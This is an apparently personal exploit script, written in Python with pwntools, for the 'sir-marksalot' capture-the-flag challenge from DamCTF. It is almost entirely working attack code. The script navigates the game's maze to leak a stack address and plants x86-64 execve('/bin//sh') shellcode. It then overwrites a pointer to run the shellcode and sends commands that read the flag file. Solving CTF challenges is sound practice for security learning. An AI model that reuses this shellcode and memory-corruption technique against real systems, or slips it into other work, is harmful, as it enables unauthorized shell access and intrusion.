sir-markslot chal from damctf

exploit2.py

#!/usr/bin/env python3

from pwn import *

print('------ TESTING VAL %d -=------' % int(sys.argv[1]))
while True:
    p = remote('chals.damctf.xyz', 31314)
    #p = remote('localhost', 9999)
    #p = process('./sir-marksalot')
    p.recvuntil('What would you like to do?\n')
    p.sendline(b'jump up and down')

    def get_maze():
        p.recvuntil('something, m - show map):');
        p.sendline(b'm')

        maze = list(str(p.recvuntil('This room has exits to the')[:-len('This room has exits to the')]))
        maze[len(maze) - len('+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+\n') - 7] = 'E'

        retval = ''
        for i in maze:
            retval += i

        return retval.replace('\\n', '\n')[3:]


    def get_pos_idx(): # x, y
        i = 0
        for line in get_maze().strip().split('\n'):
            if '*' in line:
                return (line.index('*')//4 + 1), i//2
            i += 1
        raise ValueError('Could not find *')


    def leak():
        time.sleep(0.8)
        p.clean()
        p.sendline('m')
        time.sleep(0.6)
        #move('m')
        data = p.recvuntil('you like ')

        if b'On the wall is written: ' not in data:
            return
        data = data.split(b' is written: ')[1].split(b'\n\n')[0]
        if len(data) > 8:
            print(data)
            return
        data = u64(data.ljust(8, b'\x00'))
        print(hex(data))
        return data


    def can_move(x):
        p.sendlineafter(b'm - show map): ', x)
        return b' a wall there' in p.recvuntil(b'What would')


    def move(x):
        p.sendlineafter(b'm - show map): ', x)


    def clear(data=b'?'*(0x8*4)):
        p.sendlineafter(b'm - show map): ', 'x')
        p.sendlineafter(b'What would', data)

    start_x, start_y = get_pos_idx()
    end_x, end_y = 0x28, 0x28

    for rel_xi in range(start_x - 1):
        clear()
        move('a')

    for rel_yi in range(end_y - start_y - 1):
        clear()
        move('s')

    payload = b'\x90\x90\x90' + b'\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05'
    payload += b'\xcc'
    payload = payload.ljust(0x21, b'?')
    print('payload len %d' % len(payload), '::', payload)
    
    num_extra = 9

    clear(payload)
    for i in range(num_extra):
        move('d')
        clear()

    p.clean()
    #context.log_level = 'debug'
    p.sendline('s')
    try:
        stack_rsp = leak() - 0xca20 
    except TypeError:
        p.close()
        continue
    stack_payload = stack_rsp + 0xc320 + 0x78 + (int(sys.argv[1])*3)
    print('payload addr', hex(stack_payload))

    clear()
    move('w')
    clear()
    move('a')
    clear()
    move('a')
    clear()
    move('a')
    clear()
    for i in range(num_extra - 5):
        move('a')
        clear()
    move('s')
    clear(b'B'*8 + p64(stack_payload) + b'?'*0x20)
    move('d')
    move('w')
    move('d')
    clear()
    move('w')
    clear()
    move('w')
    try:
        leak()
    except TypeError:
        p.close()
        continue

    while True:
        clear()
        p.sendline(b'a')
        if b'Grue' in p.recvline():
            break


    '''
    for rel_xi in range(end_x - 5 - 1):
        clear()
        move('d')
    '''

    p.sendline('\necho WE WON ; whoami ; cat /flag ; cat /flag.txt ; cat flag ; exit')
    print(p.recvall())
    break